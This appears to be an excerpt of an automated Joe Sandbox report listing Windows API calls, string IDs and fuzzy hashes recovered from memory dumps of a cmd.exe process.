• Opcode Fuzzy Hash: 44ed0d62170dd9e059d191d0ccd5afca994564599e9be9cd8f97a3f924e94c46
• Instruction Fuzzy Hash: 9A319A76A002199FCB20EF29CC54BEEB7FCFF44614F854556E849E7200EB309B449B60
APIs
  • Part of subcall function 0025727B: __iob_func.MSVCRT ref: 00257280
• fprintf.MSVCRT ref: 00265182
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: __iob_funcfprintf
• String ID: CMD Internal Error %s$%s$Null environment
• API String ID: 620453056-2781220306
• Opcode ID: 27bec9702eccce946741fbca5461a31417ac3bb1a54713647a690827f065cf57
• Instruction ID: 837c8dde1d8b5882f05c6adf97c726f27baa5605c785d43d0c591394bb458dcd
• Opcode Fuzzy Hash: 27bec9702eccce946741fbca5461a31417ac3bb1a54713647a690827f065cf57
• Instruction Fuzzy Hash: CE01CB37A30A239AC7386F5CB806A636310DAD2324B14056BEC5E93180FAA05DE28550
APIs
• GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 0026351B
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 0026352C
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RtlDllShutdownInProgress$ntdll.dll
• API String ID: 1646373207-582119455
• Opcode ID: 4ad890d36bc3a1855ce319e6d2599f93cc39a408a36e5aa8151c6184f369bf33
• Instruction ID: 8051eabc5d79e025b04a5710bc581c2cf8784f9092ad347cf6e36497d58c9426
• Opcode Fuzzy Hash: 4ad890d36bc3a1855ce319e6d2599f93cc39a408a36e5aa8151c6184f369bf33
• Instruction Fuzzy Hash: 9FE09239A122318B9F25DF34BD0C55A3794A749B613460052E80AE7211DB608D918FD1
APIs
• GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 002638FB
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00263907
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RaiseFailFastException$kernelbase.dll
• API String ID: 1646373207-919018592
• Opcode ID: fa9f2fc1f87b8b4a2044d613b788385bf297f86011acaac4aad30776d0d14bc8
• Instruction ID: 8582ae98a151ad146dd5dc6a9f3be5add9ba15a8b9998f70a34e9f81ad6ec993
• Opcode Fuzzy Hash: fa9f2fc1f87b8b4a2044d613b788385bf297f86011acaac4aad30776d0d14bc8
• Instruction Fuzzy Hash: 47E08C36542229BB8B211FA1EC0DC8ABF29EB457A17000022F90882120CE728920CFA1
APIs
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D3A
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D44
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D57
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D61
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: ErrorMode$FullNamePath
• String ID:
• API String ID: 268959451-0
• Opcode ID: cd90c0a58dedc504f08531fdf7902830367ccd18b39938b0ded52bea57e98d30
• Instruction ID: 703dd3cb8b5a34558b526d1a97cf85330535cb53ad8df6392dd16855f645bd4c
• Opcode Fuzzy Hash: cd90c0a58dedc504f08531fdf7902830367ccd18b39938b0ded52bea57e98d30
• Instruction Fuzzy Hash: 7D315C39520101ABCB28DF68C855A7FB7B5EF84301728851EED07CB294E7B1AE69C758
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0024C5BD
• RtlFreeHeap.NTDLL ref: 0024C5C4
• _setjmp3.MSVCRT ref: 0024C630
• VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 0024C69D
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: FreeHeap$ProcessVirtual_setjmp3
• String ID:
• API String ID: 2613391085-0
• Opcode ID: f3265a1d5c2acaf2206705f6f1915352ca104a37cc94e51eb908152ca929624b
• Instruction ID: f64f78d9fd518fc9894784ca820b753dd46bc449d28b4c1c2f7b523470b683f4
• Opcode Fuzzy Hash: f3265a1d5c2acaf2206705f6f1915352ca104a37cc94e51eb908152ca929624b
• Instruction Fuzzy Hash: E531AF70B266028FEB58DF68F88D72AB7B4FB44744F65802AE80DD7250E7749C948F91
APIs
• wcstol.MSVCRT ref: 00252977
• wcstol.MSVCRT ref: 00252987
• lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0024E559,?,?,00000000,?), ref: 002529FF
• lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0024E559,?,?,00000000,?), ref: 00252A09
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: wcstol$lstrcmplstrcmpi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4273384694-0
                                                                                                                                            • Opcode ID: d878027151fbf22b96c995eafbb0df38b87ee4a027144c05663d95cde52c7f7a
                                                                                                                                            • Instruction ID: 0b60afd0e3d46c0f35964e00f6c7489c67a341cc5e3a0a0a4ae49ba267d20d95
                                                                                                                                            • Opcode Fuzzy Hash: d878027151fbf22b96c995eafbb0df38b87ee4a027144c05663d95cde52c7f7a
                                                                                                                                            • Instruction Fuzzy Hash: 0E11D532821117EB87255E788A0C97ABB68FF02352B250210EC01E7790D7B1ED7C96E8
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0026C56B
                                                                                                                                              • Part of subcall function 0024E3F0: memset.MSVCRT ref: 0024E455
                                                                                                                                            • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 0026C5A5
                                                                                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0026C5BD
                                                                                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,00000001,00000000,00000000), ref: 0026C5DA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$DriveNamePathTypeVolume
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1029679093-0
                                                                                                                                            • Opcode ID: d219ff35a60fd30e762a9f0e209b5cc149cebfe5b3e355575e04b43cc31e3d2f
                                                                                                                                            • Instruction ID: 7d8041216090efe038f2331d127b0a452580a89d7ee55a0e33f63793b4451d22
                                                                                                                                            • Opcode Fuzzy Hash: d219ff35a60fd30e762a9f0e209b5cc149cebfe5b3e355575e04b43cc31e3d2f
                                                                                                                                            • Instruction Fuzzy Hash: 4D216671A1010AABEF10DFA5EC89BBFBBB8EB44344F540469A505E3141D774EA548B61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 37e80f3804b37d1197d7eeb94ef8a5f068ad90f36264adb8b68c25f28265b13f
                                                                                                                                            • Instruction ID: 492d56de221e304292f88cf6a41beda721165181ded542ccf8e5a345e998ea12
                                                                                                                                            • Opcode Fuzzy Hash: 37e80f3804b37d1197d7eeb94ef8a5f068ad90f36264adb8b68c25f28265b13f
                                                                                                                                            • Instruction Fuzzy Hash: 4411E235222505EBDB185F24AC8DFAF7619EF8132DF14811AE802C61D0DB70DDA2AB95
                                                                                                                                            APIs
                                                                                                                                            • _get_osfhandle.MSVCRT ref: 00269822
                                                                                                                                            • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002692EA,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0026982A
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00269841
                                                                                                                                            • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 0026986E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2448200120-0
                                                                                                                                            • Opcode ID: c2375bb0c35553a3a30fff55aac2054e5cdaebeceeb20f150eaf67abfdb72168
                                                                                                                                            • Instruction ID: c1c7a1cd0cec7fc68c355f374176152f54ef0e62c0b78ce2283ecded95cfa724
                                                                                                                                            • Opcode Fuzzy Hash: c2375bb0c35553a3a30fff55aac2054e5cdaebeceeb20f150eaf67abfdb72168
                                                                                                                                            • Instruction Fuzzy Hash: 7211C131620201AFDB199F25EC4DA7F776DEB86B65F10002AF40997151DE758CE08F65
                                                                                                                                            APIs
                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,0024BDB3,00000000,?), ref: 0024DD37
                                                                                                                                            • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0024DD3E
                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 0024DD53
                                                                                                                                            • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0024DD5A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$Process$AllocSize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2549470565-0
                                                                                                                                            • Opcode ID: f2b2370ff46c6af2900de49708a9f786852323dc7081500695b5846aa4a51aa6
                                                                                                                                            • Instruction ID: d1a23370ea3249936bb4a61fac2a1123565303df0d040f0887aedb195bcba6c7
                                                                                                                                            • Opcode Fuzzy Hash: f2b2370ff46c6af2900de49708a9f786852323dc7081500695b5846aa4a51aa6
                                                                                                                                            • Instruction Fuzzy Hash: 5901B57B621202DBDB259F64EC8DF99B768EB84B56F240021F509C7050DB75DC68C791
                                                                                                                                            APIs
                                                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,00248A51), ref: 002684B9
                                                                                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00248A51), ref: 002684C6
                                                                                                                                            • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00248A51), ref: 002684EA
                                                                                                                                            • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00248A51), ref: 002684F2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1033415088-0
                                                                                                                                            • Opcode ID: e50d1a23064593e5fda4615ac30877a7597e88a2c564ff972a885e6575bda4a4
                                                                                                                                            • Instruction ID: 48ce130a1dcef211a0d197359c3c0c766e770b15b0e3bca9f77c66b443dcc38d
                                                                                                                                            • Opcode Fuzzy Hash: e50d1a23064593e5fda4615ac30877a7597e88a2c564ff972a885e6575bda4a4
                                                                                                                                            • Instruction Fuzzy Hash: 34018F71A11119AF9B059FB8AC88AFFB7ECEF0D310B00012AF902E2150EE749D16C769
                                                                                                                                            APIs
                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,002622F8), ref: 00262514
                                                                                                                                            • RtlFreeHeap.NTDLL ref: 0026251B
                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,002622F8), ref: 00262539
                                                                                                                                            • RtlFreeHeap.NTDLL ref: 00262540
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3859560861-0
                                                                                                                                            • Opcode ID: dc5dadc4239e93616ae3e53dc6b08b38932d13782641eb273e9f34dc7ecb0314
                                                                                                                                            • Instruction ID: 053434aaccd7ce2e1458732cced12d428c1422875a30a583a71a67fbc861a2e5
                                                                                                                                            • Opcode Fuzzy Hash: dc5dadc4239e93616ae3e53dc6b08b38932d13782641eb273e9f34dc7ecb0314
                                                                                                                                            • Instruction Fuzzy Hash: 00F06872611601AFD7249FA0ED8CB56B7F8FF48312F14051EE145C6040DB78E9A5CBA1
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00256F48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00256F4F
                                                                                                                                            • __set_app_type.MSVCRT ref: 00256872
                                                                                                                                            • __p__fmode.MSVCRT ref: 00256888
                                                                                                                                            • __p__commode.MSVCRT ref: 00256896
                                                                                                                                            • __setusermatherr.MSVCRT ref: 002568B7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
• API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1632413811-0
• Opcode ID: ca4cf96503859874b4f83cd4e59a16505588a7185002033189db6ebef936b0fa
• Instruction ID: 5d8bfdd31c756879f9bc2640d364859bee2ac5ad334c615e9cd7d5f26f3c9a90
• Opcode Fuzzy Hash: ca4cf96503859874b4f83cd4e59a16505588a7185002033189db6ebef936b0fa
• Instruction Fuzzy Hash: F5F01C38529300CFDB246F30FD0E6083B60B705322B418A5AF862872F1EFB99454CF06
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
• Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
• Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
• Instruction ID: dcc40e9c352645ddb0b2018cbd8ebaf6f15c7cef958eeb5c4f10614229683ecb
• Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
• Instruction Fuzzy Hash: 4A91A271E0021A9FDF24DE69CC80ABFB7E5AF46720F18455AE865EB2C0D7309A60B750
Strings
Memory Dump Source
• Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
• Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: 5caa604e7a59dcef6d3ccc2dde2ed66e3de0b90c6d11b1e40a967b79e3618d6d
• Instruction ID: 9c80e69b107be0092113b76c1aea8deabaf880bd252727c88fd54a9098e119a4
• Opcode Fuzzy Hash: 5caa604e7a59dcef6d3ccc2dde2ed66e3de0b90c6d11b1e40a967b79e3618d6d
• Instruction Fuzzy Hash: 29810975D002699BDB21DB54CC45BEEB7B8AF09714F0445EAE919FB280E7709E84CFA0
APIs
  • Part of subcall function 0024DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0024ACD8,00000001,?,00000000,00248C23,-00000105,0026C9B0,00000240,00251E92,00000000,00000000,0025ACE0,00000000), ref: 0024DCE1
  • Part of subcall function 0024DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0024ACD8,00000001,?,00000000,00248C23,-00000105,0026C9B0,00000240,00251E92,00000000,00000000,0025ACE0,00000000,00000000), ref: 0024DCE8
  • Part of subcall function 0024A62F: wcschr.MSVCRT ref: 0024A635
  • Part of subcall function 0024C570: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0024C5BD
  • Part of subcall function 0024C570: RtlFreeHeap.NTDLL ref: 0024C5C4
  • Part of subcall function 0024C570: _setjmp3.MSVCRT ref: 0024C630
• _wcsupr.MSVCRT ref: 0025C21F
  • Part of subcall function 00251A47: memset.MSVCRT ref: 00251AE2
  • Part of subcall function 00251A47: ??_V@YAXPAX@Z.MSVCRT(00252229,?,00252229,00000000,-00000105,?,00000000,00000000), ref: 00251BA4
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
• String ID: FOR$ IF
• API String ID: 3818062306-2924197646
• Opcode ID: fc9cabd94c20dcd257498b4a13c7391032b199020c62900d832ba60163b01b34
• Instruction ID: f393b6b92310a2cf1d253790c4b677928b912cb3b4505ed23e28f8d701b40037
• Opcode Fuzzy Hash: fc9cabd94c20dcd257498b4a13c7391032b199020c62900d832ba60163b01b34
• Instruction Fuzzy Hash: BF513621B202039ADB2D7F78D85577B22A2EF90B54F684029DD06CB294FBB1DDB1C680
APIs
• GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,0024B11F), ref: 0025CB8B
• SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 0025CC2D
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: ConsoleTitle
• String ID: -
• API String ID: 3358957663-3695764949
• Opcode ID: 377a3cc7e7ade734e4e98e9b710efec979d3186e9c5978e77c163ad220ef0b85
• Instruction ID: db974be60f3fa0f33e7966ad097c8aa489f3e59179cde4282073566e7659f2d8
• Opcode Fuzzy Hash: 377a3cc7e7ade734e4e98e9b710efec979d3186e9c5978e77c163ad220ef0b85
• Instruction Fuzzy Hash: 5F217D31B102018BC71DAF2CE89D77E77A1DBC0705F28402DE8065B345EE749D96CB82